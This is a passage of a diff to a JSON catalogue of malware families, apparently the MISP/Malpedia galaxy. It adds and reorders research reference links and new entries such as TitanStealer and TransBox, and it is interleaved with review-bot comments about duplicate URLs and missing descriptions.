"https://labs.sentinelone.com/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/",
"https://www.bleepingcomputer.com/news/security/thunderx-ransomware-rebrands-as-ranzy-locker-adds-data-leak-site/",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://www.picussecurity.com/resource/blog/a-detailed-walkthrough-of-ranzy-locker-ransomware-ttps",
"https://www.ic3.gov/Media/News/2021/211026.pdf",
"https://id-ransomware.blogspot.com/2020/08/thunderx-ransomware.html",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
"https://www.mandiant.com/resources/chasing-avaddon-ransomware",
- "https://www.picussecurity.com/resource/blog/a-detailed-walkthrough-of-ranzy-locker-ransomware-ttps"
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/"
],
"synonyms": [
"Ranzy Locker"
@@ -44836,9 +47209,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tidepool",
- "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf",
"https://unit42.paloaltonetworks.com/atoms/shallowtaurus/",
- "http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/"
+ "https://www.mandiant.com/resources/operation-ke3chang-targeted-attacks-against-ministries-of-foreign-affairs",
+ "http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/",
+ "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf"
],
"synonyms": [],
"type": []
@@ -44851,12 +47225,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tiger_rat",
- "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/",
- "https://www.krcert.or.kr/filedownload.do?attach_file_seq=3277&attach_file_id=EpF3277.pdf",
- "https://www.brighttalk.com/webcast/18282/493986",
+ "https://www.attackiq.com/2023/01/05/emulating-the-highly-sophisticated-north-korean-adversary-lazarus-group/",
+ "https://blogs.vmware.com/security/2021/12/tigerrat-advanced-adversaries-on-the-prowl.html",
"https://threatray.com/wp-content/uploads/2021/12/threatray-establishing-the-tigerrat-and-tigerdownloader-malware-families.pdf",
- "https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html",
- "https://blogs.vmware.com/security/2021/12/tigerrat-advanced-adversaries-on-the-prowl.html"
+ "https://www.brighttalk.com/webcast/18282/493986",
+ "https://www.krcert.or.kr/filedownload.do?attach_file_seq=3277&attach_file_id=EpF3277.pdf",
+ "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/",
+ "https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html"
],
"synonyms": [],
"type": []
@@ -44882,20 +47257,20 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba",
- "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf",
"http://stopmalvertising.com/malware-reports/mini-analysis-of-the-tinybanker-tinba.html",
- "http://contagiodump.blogspot.com/2012/06/amazon.html",
- "http://www.theregister.co.uk/2012/06/04/small_banking_trojan/",
+ "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf",
"https://www.zscaler.com/blogs/research/look-recent-tinba-banking-trojan-variant",
+ "http://www.theregister.co.uk/2012/06/04/small_banking_trojan/",
"https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/",
+ "http://garage4hackers.com/entry.php?b=3086",
"https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://blogs.blackberry.com/en/2019/03/blackberry-cylance-vs-tinba-banking-trojan",
+ "http://contagiodump.blogspot.com/2012/06/amazon.html",
+ "http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
"https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html",
"https://securityintelligence.com/tinba-trojan-sets-its-sights-on-romania/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/",
- "https://adalogics.com/blog/the-state-of-advanced-code-injections",
- "http://garage4hackers.com/entry.php?b=3086",
- "https://blogs.blackberry.com/en/2019/03/blackberry-cylance-vs-tinba-banking-trojan"
+ "https://adalogics.com/blog/the-state-of-advanced-code-injections"
],
"synonyms": [
"Illi",
@@ -44904,15 +47279,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "75f53ead-1aee-4f91-8cb9-b4170d747cfc",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "5eee35b6-bd21-4b67-b198-e9320fcf2c88",
"value": "Tinba"
},
@@ -44922,8 +47288,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyloader",
"https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
"https://www.forcepoint.com/sites/default/files/resources/files/report-tinypos-analysis-en.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
"https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak"
],
"synonyms": [],
@@ -44937,16 +47303,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tinymet",
- "https://twitter.com/VK_Intel/status/1273292957429510150",
- "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/",
- "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/",
- "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/",
- "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/",
- "https://www.secureworks.com/research/threat-profiles/gold-niagara",
- "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/",
"https://github.com/SherifEldeeb/TinyMet",
- "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do"
+ "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/",
+ "https://twitter.com/VK_Intel/status/1273292957429510150",
+ "https://www.secureworks.com/research/threat-profiles/gold-niagara",
+ "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/",
+ "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
+ "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/"
],
"synonyms": [
"TiniMet"
@@ -44961,17 +47328,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke",
- "https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/",
- "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html",
- "https://krebsonsecurity.com/tag/nuclear-bot/",
- "https://krebsonsecurity.com/2019/12/nuclear-bot-author-arrested-in-sextortion-case/",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
"https://asec.ahnlab.com/en/27346/",
- "https://www.bitsighttech.com/blog/break-out-of-the-tinynuke-botnet",
- "https://asec.ahnlab.com/en/32781/",
"https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/",
+ "https://asec.ahnlab.com/en/32781/",
+ "https://krebsonsecurity.com/tag/nuclear-bot/",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
"https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/",
- "https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702"
+ "https://www.bitsighttech.com/blog/break-out-of-the-tinynuke-botnet",
+ "https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702",
+ "https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/",
+ "https://krebsonsecurity.com/2019/12/nuclear-bot-author-arrested-in-sextortion-case/",
+ "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html"
],
"synonyms": [
"MicroBankingTrojan",
@@ -44989,21 +47356,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tinytyphon",
- "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf",
- "https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign"
+ "https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign",
+ "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "1b591586-e1ef-4a32-8dae-791aca5ddf41",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "d2414f4a-1eda-4d80-84d3-ed130ca14e3c",
"value": "TinyTyphon"
},
@@ -45012,22 +47370,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyzbot",
- "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
"https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf",
- "https://know.netenrich.com/threatintel/threat_actor/Cutting%20Kitten"
+ "https://know.netenrich.com/threatintel/threat_actor/Cutting%20Kitten",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "e2cc27a2-4146-4f08-8e80-114a99204cea",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "b933634f-81d0-41ef-bf2f-ea646fc9e59c",
"value": "TinyZbot"
},
@@ -45057,22 +47406,36 @@
"uuid": "c34091df-0df2-4ef6-bf69-c67eb711f6d8",
"value": "Tiop"
},
+ {
+ "description": "Information stealer written in Go.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.titan_stealer",
+ "https://www.uptycs.com/blog/titan-stealer-telegram-malware-campaign",
+ "https://blog.bushidotoken.net/2022/11/detecting-and-fingerprinting.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0a98f387-885e-4ad4-b5ab-686f4c06dcf1",
+ "value": "TitanStealer"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tmanger",
- "https://insight-jp.nttsecurity.com/post/102gi9b/pandas-new-arsenal-part-1-tmanger",
- "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia",
- "https://vblocalhost.com/uploads/VB2020-20.pdf",
- "https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/",
- "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf",
- "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop",
- "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager",
- "https://www.sentinelone.com/labs/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op",
"https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/",
+ "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf",
"https://www.youtube.com/watch?v=1WfPlgtfWnQ",
- "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/"
+ "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/",
+ "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager",
+ "https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/",
+ "https://vblocalhost.com/uploads/VB2020-20.pdf",
+ "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop",
+ "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia",
+ "https://www.sentinelone.com/labs/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op",
+ "https://insight-jp.nttsecurity.com/post/102gi9b/pandas-new-arsenal-part-1-tmanger"
],
"synonyms": [
"LuckyBack"
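Review bot: the Tmanger refs list carries three near-duplicate pairs that point at the same article and are all re-added by this hunk: the decoded.avast.io URL with and without a trailing slash, the welivesecurity luckymouse URL with and without a trailing slash, and `labs.sentinelone.com/thundercats-...` next to `www.sentinelone.com/labs/thundercats-...`; collapse each pair to one entry. The new TitanStealer entry looks fine.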
@@ -45083,17 +47446,29 @@
"value": "Tmanger"
},
{
- "description": "",
+ "description": "According to PCrisk, Tofsee (also known as Gheg) is a malicious Trojan-type program that is capable of performing DDoS attacks, mining cryptocurrency, sending emails, stealing various account credentials, updating itself, and more.\r\n\r\nCyber criminals mainly use this program as an email-oriented tool (they target users' email accounts), however, having Tofsee installed can also lead to many other problems.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee",
- "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf",
"https://www.dragos.com/blog/investigating-the-watering-hole-linked-to-the-oldsmar-water-treatment-facility-breach/",
- "https://www.cert.pl/en/news/single/tofsee-en/",
- "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html",
- "https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/",
+ "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://www.spamhaus.com/resource-center/neutralizing-tofsee-spambot-part-1-binary-file-vaccine/",
"https://intel471.com/blog/privateloader-malware",
- "https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/"
+ "https://www.virusbulletin.com/virusbulletin/2014/04/tofsee-botnet",
+ "https://www.spamhaus.com/resource-center/neutralizing-tofsee-spambot-part-3-network-based-kill-switch/",
+ "https://gist.github.com/larsborn/0ec24d7b294248c51de0c3335802cbd4",
+ "https://www.spamhaus.com/resource-center/neutralizing-tofsee-spambot-part-2-inmemoryconfig-store-vaccine/",
+ "https://www.govcert.ch/blog/tofsee-spambot-features-.ch-dga-reversal-and-countermesaures/",
+ "https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/",
+ "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html",
+ "https://www.cert.pl/en/news/single/tofsee-en/",
+ "https://blog.talosintelligence.com/tofsee-spam/",
+ "https://web.archive.org/web/20090428005953/http://www.marshal8e6.com/trace/i/Gheg,spambot.897~.asp",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf",
+ "https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/",
+ "https://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining"
],
"synonyms": [
"Gheg"
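Review bot: most of the Tofsee refs churn in this hunk is reordering rather than new content: `https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf`, both cert.pl articles, the Talos threat roundup and the zerophagemalware post are each removed and re-added at a different position, so the genuinely new references (the three Spamhaus posts, GovCERT.ch, Bitsight, Virus Bulletin 2014, the Check Point and Talos Tofsee posts, the larsborn gist and the archived marshal8e6 page) are hard to pick out. Emitting refs in a stable order, sorted or in upstream order, would make future diffs show only real additions and removals. Separately, the new description is the only one in this patch that embeds `\r\n\r\n` paragraph breaks; the TransBox description added further down and the existing tRat one are single paragraphs, so either flatten it or confirm that consumers render the CRLF pair consistently.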
@@ -45122,7 +47497,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tomiris",
- "https://securelist.com/darkhalo-after-solarwinds-the-tomiris-connection/104311/"
+ "https://securelist.com/darkhalo-after-solarwinds-the-tomiris-connection/104311/",
+ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/"
],
"synonyms": [],
"type": []
@@ -45135,9 +47511,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.tonedeaf",
- "https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/",
+ "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/",
"https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html",
- "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/"
+ "https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/"
],
"synonyms": [],
"type": []
@@ -45145,6 +47521,19 @@
"uuid": "77e29e3a-d4a3-4692-b1f8-38ad6dc1af1d",
"value": "TONEDEAF"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.toneshell",
+ "https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "83bfa615-a1d4-4b61-bda0-beb560d24a97",
+ "value": "TONESHELL"
+ },
{
"description": "",
"meta": {
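Review bot: the new TONESHELL entry has an empty `description` even though it ships with a Trend Micro reference (the Earth Preta spear-phishing write-up) that could supply one; the same applies to Topinambour, TOUCHMOVE and TOUCHSHIFT added later in this patch, while TransBox shows the expected form (`"According to Trend Micro, this is a backdoor abusing the Dropbox API, used by threat actor Earth Yako."`). A one-sentence description per new entry makes the cluster usable inside MISP without following the link and lets searches match the family name in context. Also confirm that the four new `uuid` values are freshly generated and do not already appear elsewhere in the cluster, since the uuid is what MISP uses to identify a galaxy element.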
@@ -45159,15 +47548,28 @@
"uuid": "a7590aa5-d9fb-449f-8a5e-5233077b736e",
"value": "Tonnerre"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.topinambour",
+ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "fcc49738-f801-47ff-977b-9e368bc85273",
+ "value": "Topinambour"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.torisma",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/",
+ "http://blog.nsfocus.net/stumbzarus-apt-lazarus/",
"https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html",
"https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf",
- "http://blog.nsfocus.net/stumbzarus-apt-lazarus/"
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/"
],
"synonyms": [],
"type": []
@@ -45180,8 +47582,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.torrentlocker",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/"
+ "http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf"
],
"synonyms": [
"Teerac"
@@ -45191,13 +47593,39 @@
"uuid": "7f6cd579-b021-4896-80da-fcc07c35c8b2",
"value": "TorrentLocker"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.touchmove",
+ "https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "39ecb19e-790b-475b-85db-ef4c7f9c9dce",
+ "value": "TOUCHMOVE"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.touchshift",
+ "https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "accbbc7e-43f1-4232-90be-6c1fe90cbccf",
+ "value": "TOUCHSHIFT"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.toxiceye",
- "https://www.bollyinside.com/articles/how-rat-malware-is-using-telegram-to-evade-detection/",
- "https://blog.checkpoint.com/2021/04/22/turning-telegram-toxic-new-toxiceye-rat-is-the-latest-to-use-telegram-for-command-control/"
+ "https://blog.checkpoint.com/2021/04/22/turning-telegram-toxic-new-toxiceye-rat-is-the-latest-to-use-telegram-for-command-control/",
+ "https://www.bollyinside.com/articles/how-rat-malware-is-using-telegram-to-evade-detection/"
],
"synonyms": [],
"type": []
@@ -45205,16 +47633,29 @@
"uuid": "0d445373-d520-4b67-9066-72f23452c774",
"value": "ToxicEye"
},
+ {
+ "description": "According to Trend Micro, this is a backdoor abusing the Dropbox API, used by threat actor Earth Yako.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.transbox",
+ "https://www.trendmicro.com/en_us/research/23/b/invitation-to-secret-event-uncovering-earth-yako-campaigns.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e4d4af34-835a-4e39-b9e2-eb2456e5fce3",
+ "value": "TransBox"
+ },
{
"description": "tRat is a modular RAT written in Delphi and has appeared in campaigns in September and October of 2018.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.trat",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
- "https://www.gdatasoftware.com/blog/trat-control-via-smartphone",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
"https://www.proofpoint.com/us/threat-insight/post/trat-new-modular-rat-appears-multiple-email-campaigns",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf"
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://www.gdatasoftware.com/blog/trat-control-via-smartphone"
],
"synonyms": [],
"type": []
@@ -45227,9 +47668,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.treasurehunter",
- "http://adelmas.com/blog/treasurehunter.php",
"https://www.flashpoint-intel.com/blog/treasurehunter-source-code-leaked/",
- "https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.html"
+ "https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.html",
+ "http://adelmas.com/blog/treasurehunter.php"
],
"synonyms": [
"huntpos"
@@ -45244,280 +47685,284 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption",
- "https://blog.talosintelligence.com/2020/03/trickbot-primer.html",
- "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms",
- "https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/",
- "https://www.fortinet.com/blog/threat-research/global-malicious-spam-campaign-using-black-lives-matter-as-a-lure",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
- "https://www.bleepingcomputer.com/news/security/trickbot-now-steals-windows-active-directory-credentials/",
- "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure",
- "https://www.ic3.gov/Media/News/2022/220120.pdf",
- "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works",
- "https://na.eventscloud.com/file_uploads/6568237bca6dc156e5c5557c5989e97c_CrowdStrikeFal.Con2019_ThroughEyesOfAdversary_J.Ayers.pdf",
- "https://therecord.media/us-arrests-latvian-woman-who-worked-on-trickbot-malware-source-code/",
- "https://www.kryptoslogic.com/blog/2022/01/deep-dive-into-trickbots-web-injection/",
- "https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident",
- "https://community.riskiq.com/article/111d6005/description",
- "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/",
- "https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html",
- "https://www.gosecure.net/blog/2021/12/03/trickbot-leverages-zoom-work-from-home-interview-malspam-heavens-gate-and-spamhaus/",
- "https://therecord.media/trickbot-gang-shuts-down-botnet-after-months-of-inactivity/",
- "https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/",
- "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html",
- "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/",
- "https://www.intrinsec.com/deobfuscating-hunting-ostap/",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/",
- "https://www.netscout.com/blog/asert/dropping-anchor",
- "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2",
- "https://www.youtube.com/watch?v=EyDiIAt__dI",
- "https://securityintelligence.com/posts/trickbot-survival-instinct-trickboot-version/",
- "https://unit42.paloaltonetworks.com/trickbot-campaign-uses-fake-payroll-emails-to-conduct-phishing-attacks/",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-076a",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/",
- "https://www.reuters.com/technology/details-another-big-ransomware-group-trickbot-leak-online-experts-say-2022-03-04/",
- "https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/",
- "https://www.secdata.com/the-trickbot-and-mikrotik/",
- "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/",
- "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
- "https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-trickbot-infections/",
- "https://www.bitdefender.com/files/News/CaseStudies/study/316/Bitdefender-Whitepaper-TrickBot-en-EN-interactive.pdf",
- "https://threatpost.com/trickbot-amazon-paypal-top-brands/178483/",
- "https://www.cert.pl/en/news/single/detricking-trickbot-loader/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
- "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/",
- "https://www.bitdefender.com/files/News/CaseStudies/study/399/Bitdefender-PR-Whitepaper-Trickbot-creat5515-en-EN.pdf",
- "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/",
- "https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/",
- "https://krebsonsecurity.com/2020/10/attacks-aimed-at-disrupting-the-trickbot-botnet/",
- "https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a",
- "https://blog.morphisec.com/trickbot-delivery-method-gets-a-new-upgrade-focusing-on-windows",
- "https://www.deepinstinct.com/2019/07/12/trickbooster-trickbots-email-based-infection-module/",
- "https://osint.fans/service-nsw-russia-association",
- "https://unit42.paloaltonetworks.com/trickbot-updates-password-grabber-module/",
- "https://blog.cyberint.com/ryuk-crypto-ransomware",
- "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
